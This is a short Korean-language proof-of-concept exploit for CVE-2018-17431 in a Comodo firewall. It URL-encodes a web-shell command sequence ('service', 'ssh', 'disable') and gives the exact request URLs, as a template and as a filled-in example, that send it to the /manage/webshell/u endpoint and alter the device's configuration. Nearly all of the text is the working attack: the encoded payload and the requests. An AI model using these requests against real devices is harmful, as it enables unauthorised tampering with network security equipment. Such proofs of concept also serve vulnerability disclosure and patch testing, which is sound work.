
Comodo
CVE-2018-17431에 대한 개념 증명
익스플로잇:
웹 셸 시뮬레이션:
예를 들어 웹 셸에서 SSH를 비활성화하려면 다음과 같습니다:
- service [엔터 입력]
- ssh [엔터 입력]
- disable [엔터 입력]
인코딩
위 시퀀스를 URL 인코딩으로 인코딩합니다.
(Burp 인코더 플러그인 사용)
%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
실행
기본 URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (명령 실행을 위한 추가 엔터 키)
예시: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
"Configuration has been altered" 메시지가 포함된 페이지가 나타나고 설정이 변경됩니다!